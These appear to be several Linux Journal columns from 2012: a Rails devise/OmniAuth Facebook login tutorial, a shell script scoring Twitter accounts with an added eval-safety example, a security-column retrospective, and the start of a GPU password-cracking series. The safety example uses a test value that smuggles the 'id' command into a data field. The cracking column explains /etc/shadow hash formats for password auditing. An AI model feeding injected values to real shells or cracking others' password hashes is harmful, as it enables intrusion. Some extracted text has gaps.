Passwords have other problems associated with them as well. When you register with a Web site, how do you know that you can trust the site with your identity? Do you really want to create another account? You’ve already registered with many different sites through the years. Why not just use one of those logins to authenticate your session at another site? (Of course, you could argue that there’s no reason to trust certain sites, such as Facebook, but that’s another discussion entirely.)

This idea, that you shouldn’t need to register with new sites and instead should be able to use your existing registration information from other sites, has gained popularity in the last few years. A protocol known as OAuth makes it possible to put this into effect, letting any site be a “consumer” (that is, use another site’s authentication credentials) or a “provider” (that is, make its user-registration information available to other applications). This means that although people normally might use OAuth to log in via Twitter or Facebook, there’s no reason why your own applications could not be providers as well. OAuth itself is silent on this matter, allowing each consumer application to decide which providers it will and won’t allow.

This column focuses on Web applications, so I’m not going to discuss the OAuth protocol itself. For that, I suggest reading the appropriately named “A Primer to the OAuth Protocol” by Adrian Hannah in the June 2011 issue of LJ (see Resources).

A number of alternatives have been proposed through the years, but none of them really have taken off. One of the more intriguing suggestions, OpenID, is something I covered several years ago in this column, and I’d still like to see it succeed, but as a speaker mentioned at a conference I recently attended, OpenID was neither clear nor appealing to anyone outside the software development community.

This article shows how to include OAuth in your own applications. OAuth is platform-neutral, meaning you can use it from any language you like. As regular readers of this column know, I’m a big fan of the Ruby language and the Ruby on Rails framework for Web development, so I demonstrate OAuth in that way here. Implementations for many other languages and frameworks exist as well, so if you’re not a Ruby developer, consider looking for the appropriate library for your favorite language.

OAuth Basics

As I mentioned previously, I’m not going to describe the OAuth protocol in detail. Rather, I want to describe how it works from the perspective of a Web application.

First and foremost, you need to decide which providers you are interested in using and then register with each of them. Different applications will want to use different providers. For example, GitHub, a commercial service that hosts Git repositories, supports OAuth. If your users are likely to have GitHub accounts, it might be worthwhile to have it as a provider. But, if you’re creating a consumer shopping application, the odds are pretty good that most of your users won’t have GitHub accounts. Thus, you also should consider another provider, such as Facebook or Twitter.

Registering with a provider gives you a unique ID and a secret, which you can think of as a user name and password for your application. These will allow your application to connect to the provider.

When users want to authenticate to your non-OAuth site, they typically have to enter a user name and password. But if your system uses OAuth, the user name and password (or any other system) is handled by the provider, rather than by the consumer (that is, your application). So long as the provider agrees that you’re who you say you are, your application will accept that claim.

The authentication process begins when users indicate they want to log in via a third-party provider. Users are redirected to a URL on the provider’s site, where users are asked to authenticate. In some cases, this can happen in one step, passing the application’s ID; in other cases, it requires two HTTP transactions: one to get a request token and a second to perform the actual authentication. Regardless, the result of authentication is an HTTP request from the provider to your application. That request will include several additional parameters, including a code generated by the provider.

Finally, your application must make a call to the provider, combining everything you have used so far—the application’s unique ID for this provider, the secret and the code you got from the provider after the user’s authentication. If all goes well, the server will respond by requesting your URL again, indicating (via passed parameters) that you have authenticated this user.

Actually, one additional piece of information is handed to the OAuth provider, namely the “scope”, which you can think of as a set of permissions. Many providers offer different amounts of information about a person. For example, Facebook could provide you with my name and e-mail address, information about my friends or even the ability to read my chat and inbox messages.

Not all users will want to allow your application the full set of Facebook permissions.
A good general rule of thumb is that you should ask for the minimum set of permissions from the provider that will allow your application to work. If your application works on your Facebook inbox, it obviously will need permission to work with the inbox. If not, there’s no reason to grant it such permission. The permissions you request in the “scope” parameter will be displayed to the user as part of the authentication dialog, such that he or she will not be surprised by the degree to which the consumer application can access private data.

Setting Up Devise

If the above flow seems a bit complicated, that’s because it is. Instead of a simple HTML form that is submitted to a controller on your own server, you’re now having a conversation with a remote server that requires three or four different HTTP transactions, each with its own set of parameters. But, it’s pretty clear to me that for all of its complexity and added overhead, OAuth is a good way to go for many Web sites.

Fortunately, as is often the case with open-source software and network standards, freely available libraries make the integration of such functionality fairly easy. For example, let’s assume I want to create a “hello, world” application. Anonymous users get a plain-old “hello, world”, but registered users get a premium version of “hello, world”, so there’s a big incentive for people to register and sign in.

I have been using the devise library for user registration and authentication for some time now, and I’ve found it to be quite easy to use as well as flexible. I’m not the only one who has found it to be flexible though. A large number of plugin modules are available for devise, making it possible to change the way authentication is done. One of these plugins is called (somewhat confusingly) OmniAuth, which makes it possible to authenticate against a variety of sites and protocols, including OAuth.

At the shell prompt, I first created three databases in PostgreSQL:

    createdb helloworld_development
    createdb helloworld_test
    createdb helloworld_production

I then created a simple application using PostgreSQL:

    rails new helloworld -d postgresql

Next, I modified the Gemfile such that it would use devise, by adding the following line:

    gem 'devise'

Then, I invoked:

    bundle install

to ensure that the Ruby gem was installed in my application. Next, I installed devise into my application:

    rails g devise:install

With that in place, I created a new “user” model, using the generator that comes with devise:

    rails g devise user

I then created a new route, so that I can get to the home controller:

    root :to => 'home#index'

Realizing I didn’t yet have a home controller, I then added it:

    rails g controller home

Next, I removed public/index.html to ensure that it doesn’t take over from my application.

Then, I made a slight change to the database configuration file (config/database.yml). I created the database as the “reuven” user, which doesn’t require a password on my local machine, but Rails (reasonably) assumes that I want to have a unique database user for this application. So I modified config/database.yml, such that the “user name” provided was changed to “reuven”. I was able to test that database access worked correctly by using the shortcut to enter the psql database client:

    rails db -p

With all of that in place, I ran the migrations:

    bundle exec rake db:migrate

That created my user model in the database.

Next, I modified app/views/hello/index.html.erb, such that it gives a quick “Hello” response to anyone who invokes it and added the following route in config/routes.rb:

    match '/hello' => 'hello#index'

I realize that this seems like an awfully long set of steps just so you can play with OAuth. But if you’ve been doing Rails development for any length of time, this shouldn’t faze you too much, as much of it becomes second nature.

Adding Authentication

Now that I have a basic working application, I’m going to force people to log in. Because I’m using devise, I can add a before filter to any controller that forces users to log in if they haven’t done so already. I just add the following inside the controller’s classes for people to be signed in:

    before_filter :authenticate_user!

I put this line at the beginning of the class definition of HelloController. And sure enough, the next time I went to / on my server, I got a registration form.

So far, so good, but say you don’t want to have a devise registration form. Rather, you want people to sign in via a third-party application. For now, let’s say you want people to log in via Facebook. How do you accomplish that?

Well, the first thing you need to do is ensure that you’re on a “real” URL, on a publicly available server.
It’s nice to develop on your own local computer,
I added a line here for Facebook:

    config.omniauth :facebook, '149179328516589',
      'XXXXXX59862dede3791430ffXXXXXXXX',
      :scope => 'user_about_me,user_education_history,read_friendlists'

Notice how the scope is Facebook-dependent; each provider can set its own list of scopes, according to what information it has to offer.

Finally, you need to modify your application such that when the user wants to log in, you go to Facebook, rather than to the default registration and login forms. For this to work, you need at least one page without authentication enabled. (As a general rule, you don’t want to authenticate every page on a system—after all, users should be able to see the home page without logging in, right?)

Thus, I changed the before_filter in HelloController to read:

    before_filter :authenticate_user!, :except => :index

In other words, users need to be authenticated except for your home (default) page, index. I also added a new route to config/routes.rb:

    match '/goodbye' => 'hello#goodbye'

This means that your “hello” controller responds to a second action, named “goodbye”. And, according to the rules you have established, users who want to see “goodbye” need to log in. Sure enough, after putting in these changes, going to /hello results in a “hello!” being displayed, without any need to register or log in. But, going to /goodbye redirects you to the devise login form.

Now that users can come to your home page without being logged in, you can provide them with the option to log in, either using your regular registration system or via Facebook. The easiest way I’ve found to do this is to modify the default layout for the application, in app/views/layouts/application.html.erb. I added the following:

In other words, users now can sign up (register) with your local registration system or log in directly using their Facebook accounts. The user_omniauth_authorize_path(:facebook) helper was created automatically by devise when you defined your model as :omniauthable. This is why, by the way, you can have only a single model defined as :omniauthable in devise. It normally isn’t an issue, although I have seen systems in which there were two different login schemes, one for regular users and one for administrators.
If the user decides to log in as usual, nothing changes. But if the user clicks on “sign in with Facebook”, the whole OAuth system kicks into gear, which means that if you’re testing your software on a computer or server that’s not identical to what you told Facebook, you’ll receive an error indicating that the redirection URL didn’t work correctly.

When I clicked on the “sign in with Facebook” link, my browser was redirected to a Facebook page which told me, very simply, that the “helloworld” application would like to get information about me and about my education. This reflected at least part of the scope that I had defined back in devise.rb:

    :scope => 'user_about_me,user_education_history,read_friendlists'

But, what about reading my list of friends? Did Facebook somehow forget? Not exactly. After signing in on that initial page, Facebook then gave me a new page, indicating that:

    To enhance your experience, helloworld would also like permission to:

Devise::OmniauthCallbacksController

This is because I still need to do two things. First, I need to update my route, such that the Facebook callback will be handled by devise. I can do this by modifying config/routes.rb, such that the original route:

    devise_for :user

is replaced by:

    devise_for :user, :controllers => {
      :omniauth_callbacks => "users/omniauth_callbacks"
    }

This means that when Omniauth is invoked for a callback, I want the users/omniauth_callbacks controller to take care of this. The second thing I must do is define this controller, by putting omniauth_callbacks.rb inside of app/controllers/users, a subdirectory that I must create. I took the definition of this controller straight from the devise documentation:

    class Users::OmniauthCallbacksController < Devise::OmniauthCallbacksController
      def facebook
        # Look up (or create) the local user for the data Facebook sent back.
        @user = User.find_for_facebook_oauth(env["omniauth.auth"], current_user)

        if @user.persisted?
          flash[:notice] = I18n.t "devise.omniauth_callbacks.success", :kind => "Facebook"
          sign_in_and_redirect @user, :event => :authentication
        else
          # No saved user: keep the provider data and send the person to registration.
          session["devise.facebook_data"] = env["omniauth.auth"]
          redirect_to new_user_registration_url
        end
      end
    end

In other words, I want to find a user in my database based on the Facebook OAuth information I got back. If I already have such a user in the system, then I sign in as that user. Otherwise, I ask the person to register as a new user.

But of course (and yes, this is the last step), I need to define the method User.find_for_facebook_oauth. Again, the devise documentation offers a solution, in that you can define this class method as follows (with some modifications from the original):

    def self.find_for_facebook_oauth(access_token, signed_in_resource=nil)
      data = access_token['extra']['raw_info']

      if user = User.find_by_email(data["email"])
        user
      else # Create a user with a stub password.
        u = User.new(:email => data["email"])
        u.password = Devise.friendly_token[0,20]
        u.save!
        u
      end
    end

When you try to log in again via Facebook, you’re thus taken to the URL from your OAuth handler, and...well, on my system, I get an error, indicating that my new User instance was not created in the database, because I violated one or more of the validations on my Rails User model. Which ones? The e-mail address and password cannot be blank.

How can this be? Well, you can see that if the user does not exist, then you try to create it with the e-mail address that you got from Facebook, stored in the “data” hash that this method creates:

    u = User.new(:email => data["email"])
    u.password = Devise.friendly_token[0,20]
    u.save!

In order to better understand this, I added the following line to the find_for_facebook_oauth method, just after defining the “data” hash:

    logger.warn data.to_yaml

And sure enough, when I tried to log in via Facebook again, I got a lot of information about myself in the controller, but not my e-mail address. That’s because the scope that I defined in config/initializers/devise.rb didn’t include “email”. You can update that definition:

    :scope => 'email,user_about_me,user_education_history,read_friendlists'

Then you have to restart the server
COLUMNSWORK THE SHELLMore TwitterUser StatsDAVE TAYLORCan a formula quantify whether someone is worth followingon Twitter? Dave tackles this complex subject with a niftyshell script and some math.In my last article, I started a script thatidentified user stats for Twitter accounts,with the intention of being able toanalyze those stats and come up with anengagement or popularity score. Yeah, it’skind of like Klout, but without the privacyimplications or cross-platform sniffing.The motivation behind creating thescript is to have a tool that lets youquickly differentiate between Twitterusers who are spammers or bots andthose who are influencers—for example,users who have more followers thanpeople they ostensibly follow.With surprisingly little work, I createda short script snippet that extracted basicTwitter figures: followers, following, numberof tweets and the number of Twitter liststhat include the Twitter account in question:stats="$(curl -s $twitterurl/$username |➥grep -E '(stats_count|stat_count)'➥| sed 's/]*>/ /g;s/,//g')"echo $statsThe problem is, I ran out of spaceafter realizing that some accounts werepresented in one format while otherswere in another, as shown in these twodiffering results:$ sh tstats.sh gofatherhood3 0 0 0 Tweets$ sh tstats.sh filmbuzz#side .stats a:hover span.stats_count #side .stats a➥span.stats_count 1698 4664 301 13258 TweetsThat’s not good, so let’s start by fixing it.Filters Rely on Low-Level Page FormatThe problem, of course, is that mycomplicated grep sequence relies on thepage being formatted in a very specificmanner. If Twitter changes it even theslightest bit, things might well requireupdates and tweaks. Next time, we’lljust get a supercomputer and some AI.For now though, I’ll make the—rash—assumption that I’ve found both possible40 / JANUARY <strong>2012</strong> / WWW.LINUXJOURNAL.COM
output formats between @FilmBuzz and my new @GoFatherhood Twitter accounts (the former tied to my film blog, http://www.DaveOnFilm.com, and the latter tied to my new dad blog http://www.GoFatherhood.com, in case you’re curious).

To normalize the output, I simply can filter out the “.stats” line:

    twitterurl="http://twitter.com"    # no trailing slash

    if [ $# -ne 1 ] ; then
      echo "Usage: $0 TWITTERID"
      exit 1
    fi

    username="$1"

    # fetch the profile page, keep the stats lines, strip tags and commas,
    # then drop the CSS line that mentions ".stats"
    stats="$(curl -s $twitterurl/$username |
      grep -E '(stats_count|stat_count)' |
      sed 's/<[^>]*>/ /g;s/,//g' | grep -v '.stats')"

    echo $stats

The result is exactly as desired now:

    $ sh tstats.sh filmbuzz
    1698 4664 301 13259 Tweets

The next logical step is to identify each of those fields, so we can do some basic calculations and screening.

With a set of numbers separated by spaces, there are a couple ways to pull them into variables, but my favorite is to use sed to turn the set of values into a name=value sequence, as illustrated in this simple example:

    eval $(echo 1 2 3 | sed 's/^/a=/;s/ /;b=/;s/ /;c=/')

The intermediate output of this is a=1;b=2;c=3, and when it’s evaluated by the shell (the eval and the $() subshell working together), the result is that there are now three new variables in the shell, a, b and c, with the values 1, 2 and 3, respectively:

    $ echo b = $b
    b = 2

To apply this in our Twitter script, I’ll just make the smallest tweaks:

    eval $(echo $stats | cut -d' ' -f1-4 |
      sed 's/^/fwing=/;s/ /;fwers=/;s/ /;lists=/;s/ /;tweets=/')

    echo "$1 has sent $tweets tweets and follows $fwing, has $fwers followers and is on $lists lists."

Note that I had to add a cut invocation to get rid of the word “Tweets” (see the
earlier script output) to ensure that eval doesn’t get confused with its variable assignments. The result is nice:

    filmbuzz has sent 13259 tweets and follows 1698, has 4664 followers and is on 301 lists.

Trying a different user?

    davetaylor has sent 30282 tweets and follows 567, has 10284 followers and is on 791 lists.

Good. Now let’s talk numbers.

Lightweight Numbers, Lightweight Results

Before I proceed, yes, I realize that the only outcome we can have from trying to analyze these most basic of stats is going to be a very simplistic score of whether someone is “interesting” or has any authority in the Twitterverse. Useful additional stats would be how many times they’re re-tweeted (others rebroadcast their messages), what percentage of their tweets include a URL (which can indicate whether they’re simply disseminating Web content or actually participating on Twitter) and what percentage of their tweets reference another Twitter account or, ideally, are actually replies to other Twitter users.

We could calculate some of these figures by pulling the 100 most recent tweets from an account and quickly scanning for the @ symbol, an http: sequence and so forth, but I’ll leave that as an exercise for you, the reader, and look forward to someone submitting the improved code to our archives at Linux Journal.

For now, I’m going to posit that an interesting tweet value can be calculated like this:

    (followers / following) * (lists/1000) * (tweets/1000)

It’s not perfect. Indeed, my friend F. Andy Seidl points out that 100/10 isn’t necessarily only half as influential as 200/10 and suggests we use logarithms, but let’s work with this basic calculation first and see what we get.

For my @DaveTaylor account, here’s the base math:

    (10284 / 567) * (793/1000) * (30285/1000)

which solves down to 434.
By comparison, @FilmBuzz with a much closer ratio of followers to following solves down to the value 11, and the brand-new, zero value @GoFatherhood solves—unsurprisingly—to zero.

Robert Scoble of Rackspace is an interesting case to examine here. His stats: scobleizer has sent 56,157 tweets and follows 32,527, has 21,6782 followers and is on 19,134 lists. Impressive. His score? 7,161.

One more example before we implement
the formula: @linuxjournal has sent 3,208 tweets and follows 5,050, has 12,050 followers and is on 1,165 lists. Score: 9.

Suffice it to say, it’s a weak analysis system. Still, it’s at least something to explore and, as I suggested earlier, there are lots of ways to refine and improve the formula once you can extract individual data points easily from the Twitter stream.

Coding the Score

Math is most commonly implemented using the bc program, and since we have nicely named variables, it’s a breeze to implement in the script:

    echo "scale=2;($fwers / $fwing) * ($lists/1000) * ($tweets/1000)" | bc

Fully implementing it with some friendly output involves a slight tweak of the earlier echo statement coupled with the use of the /bin/echo version of the command that knows the -n (no line break at the end) version. You’ll see why:

    /bin/echo -n "$1: $tweets tweets sent, follows $fwing, has $fwers followers, is on $lists lists. SCORE: "
    echo "scale=2;($fwers / $fwing) * ($lists/1000) * ($tweets/1000)" | bc

With this in hand, a few quick test calculations:

    $ sh tstats.sh davetaylor
    davetaylor: 30285 tweets sent, follows 567, has 10283 followers, is on 793 lists. SCORE: 433.60
    $ sh tstats.sh linuxjournal
    linuxjournal: 3208 tweets sent, follows 5050, has 12050 followers, is on 1165 lists. SCORE: 8.83
    $ sh tstats.sh arrington
    arrington: 9163 tweets sent, follows 1852, has 100477 followers, is on 7729 lists. SCORE: 3836.29

It’s not unreasonable that Mike Arrington, with 100,477 followers against the 1,852 that he follows should have a high Twitter influence score, while Linux Journal, with its 12,050 followers against the 5,050 it’s following is ostensibly less popular or influential.

Anyway, I’ve run out of space here. I hope this has been interesting, and I highly encourage you to push on this idea and see both what additional numbers you can glean from Twitter and how they can all be combined into a single numeric score that could offer up a Twitter score.■

Dave Taylor has been hacking shell scripts for more than 30 years. Really. He’s the author of the popular Wicked Cool Shell Scripts and can be found on Twitter as @DaveTaylor and more generally at http://www.DaveTaylorOnline.com.
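The eval line in the column above passes text fetched from a remote page over plain http to the shell parser, so any shell syntax that ends up in those four fields would be executed. As an added example (not part of Dave Taylor's script), the following reads the same fields with read and accepts only digits; the function names parse_stats and can_score and the sample lines are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the column): assign the four scraped numbers to
# shell variables without eval, so text from the remote page is never parsed
# as shell code.

# parse_stats "<stats text>"
# Accepts the normalized line, e.g. "1698 4664 301 13259 Tweets".
# On success sets fwing, fwers, lists and tweets and returns 0.
# Returns 1, leaving those variables untouched, unless the first four fields
# are plain decimal integers of at most 12 digits.
parse_stats() {
    # read only splits on whitespace; the field contents are not expanded.
    read -r _a _b _c _d _rest <<EOF
$1
EOF
    for _v in "$_a" "$_b" "$_c" "$_d"; do
        case "$_v" in
            ''|*[!0-9]*) return 1 ;;       # empty, or contains a non-digit
        esac
        [ "${#_v}" -le 12 ] || return 1    # implausibly long number
    done
    fwing=$_a fwers=$_b lists=$_c tweets=$_d
    return 0
}

# can_score: the column's formula divides by $fwing, so a zero value must be
# caught before the expression is handed to bc.
can_score() {
    [ "$fwing" -gt 0 ]
}

# Constructed sample inputs: two well-formed lines and two that are rejected.
for line in \
    "1698 4664 301 13259 Tweets" \
    "0 5 1 10 Tweets" \
    '1698 4664;id 301 13259 Tweets' \
    '#side .stats a:hover span.stats_count'
do
    if parse_stats "$line"; then
        if can_score; then note="score can be computed"; else note="follows 0, no score"; fi
        echo "accepted: tweets=$tweets fwing=$fwing fwers=$fwers lists=$lists ($note)"
    else
        echo "rejected: $line"
    fi
done
```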
COLUMNS
PARANOID PENGUIN

fide experts and all-around alpha geeks provided palpable incentives for getting things right! But I must say, as much as I used to worry about being exposed as a charlatan by some angry sysadmin or another, that day never came. I’ve been subject to plenty of criticism and error-correction during the years, but 99% of it has been constructive and kind, for which I’ve been abidingly grateful.)

That first year, I also wrote a couple more-generalized pieces, “Designing and Using DMZ Networks to Protect Internet Servers” (March 2001, http://www.linuxjournal.com/article/4415) and “Practical Threat Analysis and Risk Management” (January 2002, http://www.linuxjournal.com/article/5567). These were both pieces that involved skills I had exercised regularly in my day-to-day work as a security consultant, and they gave (I hope) some context to the tools I was tutorializing.

This was the pattern I tried to maintain through the subsequent decade: carefully researched and tested technical tutorials, interspersed now and then with higher-level security background.

Reviews and Interviews

The higher-level articles consisted of more than just me ranting about what I think constitutes good security. Sometimes, I let other hackers do the ranting, in candid interviews: Weld Pond (Chris Wysopal) in the September 2002 issue (http://www.linuxjournal.com/article/6126); Richard Thieme in December 2004 (http://www.linuxjournal.com/article/7934); Marcus Meissner in October 2008 (http://www.linuxjournal.com/article/10183); Anthony Lineberry in August 2009 (http://www.linuxjournal.com/article/10505); and most recently, “Ninja G” in March and April 2011 (http://www.linuxjournal.com/article/10970 and http://www.linuxjournal.com/article/10996).

The Richard Thieme and Ninja G interviews were especially fun for me to write, because in both cases the entire exercise amounted to replicating in print exactly the type of private conversations I’ve enjoyed with Richard and G through the years at DEF CON and
elsewhere. And sure enough, they each rose to the occasion, displaying in their own ways not only technological brilliance, but also fascinating opinions and stories about many other things besides, including Homeland Security, hacking as quest for truth, ninjutsu and nautical martial arts.

Besides interviewing hacker celebrities, I also wrote a couple product reviews: BestCrypt in June 2002 (http://www.linuxjournal.com/article/5938) and Richard Thieme’s book Islands in the Clickstream in March 2005 (http://www.linuxjournal.com/article/7935). You may wonder, why so
few reviews, given what an excellent way this is to obtain free products?

First, I can recall attempting at least two other evaluations: one was of some WLAN (802.11b) host adaptors that were supposedly Linux-compatible, and the other was of a miniature embedded computer platform that supposedly was optimized for Linux. In both cases, I failed to get the evaluation hardware working properly. Because “it doesn’t work” falls rather short of the 2,500-word submission quota I usually had to meet, I chose different topics for those two months’ columns.

Four attempted reviews (two successful) in 11 years isn’t a very high rate, I admit. The other reason I didn’t attempt more of them was philosophical. It seemed that it was more immediately useful for me to stick mainly to writing tutorials of popular, free software tools, than to evaluate commercial products that in many cases were redundant with such tools.

Which isn’t to say I was or am against commercial software. For example, by covering the free (GPL) version of the Zorp firewall in March and April 2004 (http://www.linuxjournal.com/article/7296 and http://www.linuxjournal.com/article/7347), I indirectly gave a minor boost to the commercial Zorp Pro, which (at that time, at least) was configured in a very similar way. Rather, I chose to focus mainly on free software, because I could and because it felt good to support developers to whom I felt I owed something.

Supposedly Fun Things I Never Did Again

Some ubiquitous tools, like BIND and iptables, I covered more than once through the years. With others, I may have written about them only once in Linux Journal, but revisited them in further depth when I wrote the book Building Secure Servers With Linux in 2002, and its second edition, retitled Linux Server Security in 2005.
(Like many of my articles, I’ve been pleasantly surprised at how much of Linux Server Security is still relevant. But the main reason I mention the book here is that it grew directly out of my Paranoid Penguin columns!)

Other tools, however, I was happy to abandon shortly after figuring out how to operate them properly. In one case, the tool itself wasn’t bad; the underlying protocol, of which the tool was simply an implementation, was and is hopelessly convoluted.

I’m going to indulge myself in a little coyness and not name these tools I found excuses to abandon. Just because I don’t enjoy using something doesn’t mean I’m not grateful to those who donated their time and talent to develop it.

What I’m really trying to say is that complexity-fatigue is still one of Linux’s
biggest ongoing challenges. Even hackers sometimes are overwhelmed by how complicated it can be to get a single piece of software running properly under Linux. By “complexity”, I don’t just mean “requiring the use of a command prompt”. On the contrary, I have an abiding fondness for applications that pull all their configuration information from a single text file, rather than scattering settings across multiple files (or worse, in a binary data file that can be modified only by some GUI tool).

Have you ever noticed that one of the highest forms of praise we give Linux distributions and applications is “it just works”? This, in my opinion, is a big reason Ubuntu has been so successful. An almost unprecedented percentage of things in Ubuntu “just work”. This speaks not only to Ubuntu’s stability and sensible default settings, but also to how easy it is to configure it properly.

I don’t value simplicity just because I’m mentally lazy (which I totally admit to being). Complexity is the enemy of security. It makes it harder to spot configuration errors, it leads to unforeseen dependencies and interactions, and it incites otherwise-upstanding and industrious system administrators to take shortcuts they wouldn’t ordinarily contemplate.

Recurring Themes

Which, if you’ve been reading the column a while, probably is something you’ve read here before. Across all these different applications and technologies I’ve researched, tested and written about, I’ve seen a number of recurring themes and commonalities.

First, the key to securing anything, be it a single application or an entire operating system, is to disable unnecessary functionality and to leverage available (and relevant) security capabilities fully.

Second, the worst way to use any Linux tool is to succumb to the notion that only root can do anything useful.
The more things running as root on your system, the more things an attacker might be able to abuse in a way that leads to total system compromise. Therefore, it’s important to run processes under less-privileged accounts or to use SELinux or AppArmor to curb root’s omnipotence.

Third, firewalls are neither dead, irrelevant nor obsolete. With so much of our network use focused on the browser, and with mainstream firewalls (including Linux’s Netfilter/iptables) having made little progress overall in gaining application visibility and intelligence, firewalls certainly are less helpful than they were 11 years ago. But this doesn’t mean we can live without firewalls. It just means we need to find additional controls
(application gateways/proxies, encryption tools and so forth) to pick up the slack.

Fourth, we’re still suffering from a general lack of security controls in protocols on which the Internet relies. SMTP, DNS and even IP itself were created long ago, at a time when computer networks were exotic and rare. Even TLS/SSL, whose sole purpose is to add security to Web transactions, was designed with a very primitive and limited trust model that has not stood up very well against man-in-the-middle attacks or against Certificate Authority breaches.

Securing these old protocols, like securing Linux itself, usually amounts to implementing new security features (SMTP STARTTLS, DNSSEC and so forth) that have entered the mainstream only recently.

On a related note, in January 2010, I wrote a column titled “Linux Security Challenges 2010” (http://www.linuxjournal.com/article/10647). I’m both pleased and depressed by how much of it still seems relevant, nearly two years later. Suffice it to say that virtualization, cloud computing, man-in-the-middle attacks against TLS/SSL and targeted malware have, collectively, made it that much more imperative to do the hard work of securing our systems and applications, and to find new ways both to implement “least-privilege” security models and to make it easier to run applications securely.

Conclusion

So here I am, 11 years after I started, paranoid about nearly all the same things I was paranoid about when I began, just more so. Am I worried? Not really. On the contrary, I’m comforted knowing that so many things both bad and good about how we understand security to work appear to be more or less constant. This doesn’t get us off the hook for keeping current with new attacks and new technologies.
It does, however, mean that what we knew yesterday will make it easier for us to learn what we need to know tomorrow, in order to operate securely.

Thank you, Jill Franklin, Carlie Fairchild and my other dear friends at Linux Journal, and especially to you, my engaged, inquisitive and altogether remarkable readers, for accompanying me on this 11-year journey and for making it possible for me to learn so much in such a public way. I don’t know when I’ll be writing about Linux security again, but I know that it will be here.

I hope that in the meantime, you remain safe!■

Mick Bauer is Principal Security Architect for a health insurance company in Minnesota. He’s the best player of the uilleann (Irish) pipes on his block, a passable maker of candlesticks, flutes and other long round wooden objects, and is the extremely proud father of four implausibly fabulous daughters.
COLUMNS
HACK AND /

Password Cracking with GPUs, Part I: the Setup

KYLE RANKIN

Bitcoin mining is so last year. Put your expensive GPU to use cracking passwords.

When the Bitcoin mining craze hit its peak, I felt the tug to join this new community and make some easy money. I wasn’t drawn only by the money; the concepts behind Bitcoin mining intrigued me, in particular the new use of graphics processors (GPUs). With a moderately expensive video card, you could bring in enough money to pay off your initial investment and your electricity bill in a relatively short time.

Then Bitcoin tanked. That’s okay though, because I hadn’t gotten around to building my mining rig yet, and what’s more, I found an even more interesting use for Bitcoin mining hardware: password cracking. Bitcoin mining and password cracking are quite similar operations, and a GPU can crack passwords much faster than a CPU or even a small cluster of CPUs. In this two-part article, I explain how to set up and use a password-cracking computer. In this first piece, I focus on the principles behind password cracking and the overall hardware setup. I’ll cover the specific attacks and command-line examples in the following article.

Legitimate Reasons to Crack Passwords

Before I get started, let’s admit that there are some pretty shady reasons to crack passwords. Every so often you will hear a story of a Web site that was hacked, a password database that was compromised and the thousands of weak passwords that were discovered. Often people get into password cracking because
they are trying to break into someone else’s system, or they already broke into someone’s system, stole their password hashes and are cracking the passwords so they can attack yet another system.

That said, like with lock picking, there are legitimate reasons to crack passwords, particularly for a sysadmin or Webmaster:

- Test local users’ password strength.
- Prove that users follow your password policy.
- Understand what your password policy should be.
- Cryptography is interesting.
- Bitcoin mining is no longer profitable.

In fact, many Linux systems will run a basic dictionary attack when you change your password to evaluate how weak it is. Although it’s true that these days most password systems will not allow users to enter passwords that don’t fit the password policy, some systems simply let users know their passwords are weak but store them anyway. In either case, it makes sense to audit your passwords at a company just to ensure that a random hacker with a $300 video card can’t crack your passwords in a day or two. When you put yourself in the role of the password cracker, you’ll start to realize which passwords are easy to crack and which ones are almost impossible, and that will help inform you when it’s time to update your password policy.

An Introduction to Password Hashes

Password hashes were created to solve a particularly tricky problem. If users must enter passwords to log in, you have to store those passwords on the system somehow. How do you store those passwords so that they’re not plain text, yet when users enter their passwords, you can tell that they are correct? The solution is to encrypt passwords with a one-way hash. The idea behind a one-way hash is that it is relatively easy for input to get encrypted into the hash, but almost impossible to convert the hash back to the original input.
If you’ve ever downloaded a Linux .iso and run md5sum on it to make sure it matched the original, you were using a very popular one-way hashing algorithm, MD5. Other popular one-way hashes include the SHA family (SHA1, SHA256 and SHA512), and phpass is the modern default for PHP-based sites like WordPress.

When you log in to a Linux system, the password you enter gets converted into a hash with the same algorithm originally used when you first set your password. The system compares this new hash with
the hash it has stored on the system, and if they match, it assumes you entered the correct password and you are logged in. So for instance, on a modern PHP site, if your password was 123456, it might get stored as $P$BPlIiO5xdHmThnjjSyJ1jBICfPkpay1.

How Password Cracking Works

On a very basic level, password cracking works much like a regular login. You take a password guess, run it through a hashing algorithm and compare it to the existing hash. If it matches, you cracked the password. The main difference between cracking and a regular login is that you are doing hundreds of thousands if not millions of these comparisons a second.

/etc/passwd and /etc/shadow

The most important thing you need before you crack a password is the password hash. Because we are talking about perfectly legitimate uses of password cracking, this is simple. After all, you should have root access on your own systems or databases, and it should be easy to retrieve the password hashes. In the case of Linux logins, these password hashes used to be stored in
/etc/passwd. That seems like a logical place to store passwords on a Linux system. The problem is, that file also stored the user names and user IDs in use on the system, and because of that, the file needs to be world-readable. Back when passwords were stored in that file, any local user could pull the full list of password hashes and start cracking. These days, Linux stores the password hashes in /etc/shadow, where they are readable only by root. In the case of Web site passwords, the hashes usually are stored either somewhere on the filesystem itself or often in a special user table in a database.

The second important thing you need is to know what hashing algorithm was used for those hashes. Without that, you won’t know what type of hashing algorithm to use for your attack. In the case of login hashes, the hash type is stored in the password hash itself. If you look at a password hash in /etc/shadow, you’ll notice a lot of strange characters along with a few $ thrown in. These $ characters delimit different sections of the hash as follows:

    $id $salt $encrypted
The id section tells you what hash is being used:

- 1 = MD5
- 5 = SHA-256
- 6 = SHA-512

These days, you are most likely to run into SHA-256 and SHA-512 passwords. Because the hashing algorithm and the salt are stored along with the password itself, Linux password hashes are pretty portable. If you have one hash, you can copy it to another system and use the same password to log in.

Why Use a GPU?

The simple reason to use a GPU instead of a CPU for password cracking is that it’s much faster. It turns out that cracking passwords is a lot like mining Bitcoins, so the same reasons GPUs are faster for Bitcoin mining apply to password cracking. The short answer is that there are many more specialized chips on a GPU that perform 32-bit operations really quickly. Although a CPU can perform a lot of general-purpose calculations, the chips on a GPU can perform specific types of operations much faster, and in a much more parallel way. If you want more specifics, this site explains in more detail from the perspective of Bitcoin mining: https://en.bitcoin.it/wiki/Why_a_GPU_mines_faster_than_a_CPU.

The Hardware

The most important piece of hardware you need to crack passwords is a fast GPU. Because cracking passwords is like mining Bitcoins, you can get a good idea of how your GPU would perform by how well it would mine Bitcoins.

